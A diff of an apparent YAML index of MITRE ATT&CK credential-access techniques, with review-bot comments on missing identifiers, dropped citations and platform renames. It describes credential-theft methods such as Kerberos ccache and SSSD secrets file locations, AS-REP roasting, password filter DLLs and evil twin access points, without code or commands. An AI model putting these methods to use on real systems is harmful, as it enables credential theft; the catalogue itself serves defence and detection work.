- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44472,76 +45092,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
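Review bot: the new T1558.005 object in this hunk ends with `atomic_tests: []` but carries no `identifier:` key, while the sibling T1558.004 object later in this file ends with `identifier: T1558.004` immediately before its `atomic_tests: []`; if the index generator is expected to emit `identifier` for every technique, add `identifier: T1558.005` before `atomic_tests: []`, otherwise confirm the omission is intended so downstream lookups by identifier do not silently miss this sub-technique. The object also ships `x_mitre_detection: ''`, so anything that surfaces detection guidance from this field shows nothing for the Linux/macOS ticket-theft sub-technique; the platform-level detail that used to live in the T1558 description (SSSD secrets database, ccache, KCM) is the only place that content exists, so a reviewer should check that it survived the move into the T1558.005 description rather than being dropped.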
@@ -44576,6 +45249,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44583,32 +45263,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
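Review bot: two things in the T1558.004 and T1558 portions of this hunk deserve a second look. First, `x_mitre_permissions_required:` / `- User` is removed from T1558.004 along with `spec_version: '2.1'` and the `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0; that is a schema change, so any consumer of this index that filters on the permissions field loses that data for this technique and should be checked. Second, the T1558 description drops its Linux (ccache, SSSD `secrets.ldb` and `.secrets.mkey`) and macOS (KCM, `KRB5CCNAME`) paragraphs, and those paragraphs cite `MIT ccache` and `macOS kerberos framework MIT`; neither of those source names appears in the reference list of the new T1558.005 object shown earlier in this diff, so verify the sub-technique's description does not still contain `(Citation: MIT ccache)` or `(Citation: macOS kerberos framework MIT)`, because an unresolved citation key renders as literal text. The Harmj0y link change from `http://www.harmj0y.net/...` to `https://blog.harmj0y.net/...` with a refreshed retrieval date is a good fix.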
@@ -44644,7 +45360,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -44669,13 +45385,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
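Review bot: removing the `Kekeo` and `SpectorOps Bifrost Kerberos macOS 2019` references from T1558 is safe only because the description paragraphs that cited them were removed in the preceding hunk; both source names reappear verbatim in the new T1558.005 reference list, so the citations resolve there. The remaining T1558 description cites `ADSecurity Kerberos Ring Decoder` and `Microsoft Klist`, and neither of those entries is touched by this diff.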
@@ -44684,14 +45393,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
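Review bot: unlike `Kekeo` and the SpectorOps entry, the two references removed here, `macOS kerberos framework MIT` and `MIT ccache`, are not re-added anywhere visible in this diff, so they leave the index entirely; that is only correct if neither the trimmed T1558 description nor the new T1558.005 description still cites them. If the T1558.005 description does cite them, add the two entries back under its `external_references:` rather than leaving a dangling `(Citation: ...)` key.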
@@ -44713,23 +45414,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
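Review bot: the `Brining MimiKatz to Unix` and `Linux Kerberos Tickets` entries dropped from T1558 here are carried over verbatim (including the upstream "Brining" spelling of the source name) into the T1558.005 reference list earlier in this diff, so the move is clean; do not correct the spelling in one place without the other, since the `(Citation: ...)` key in the description must match `source_name` byte for byte. The removal of `spec_version: '2.1'` from T1558 is one instance of a change repeated for every object in this diff, so the index generator has evidently stopped emitting that key, which is worth a line in the commit message for anyone diffing the index downstream.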
@@ -44780,12 +45472,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44797,6 +45488,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -44811,18 +45503,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
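Review bot: T1552 loses the `Azure AD`, `Office 365` and `Google Workspace` platforms and gains `Office Suite` and `Identity Provider`, with the version bump from 1.3 to 1.4 reflecting that; this matches the ATT&CK platform consolidation in which those three cloud platforms were folded into the two new names. Any per-platform index that is derived from `x_mitre_platforms` will stop listing T1552 under the old platform names unless the generator maps the new names, so check the platform-specific index files in the same change. The relocated `x_mitre_modified_by_ref` is an ordering change only.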
@@ -44845,37 +45537,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
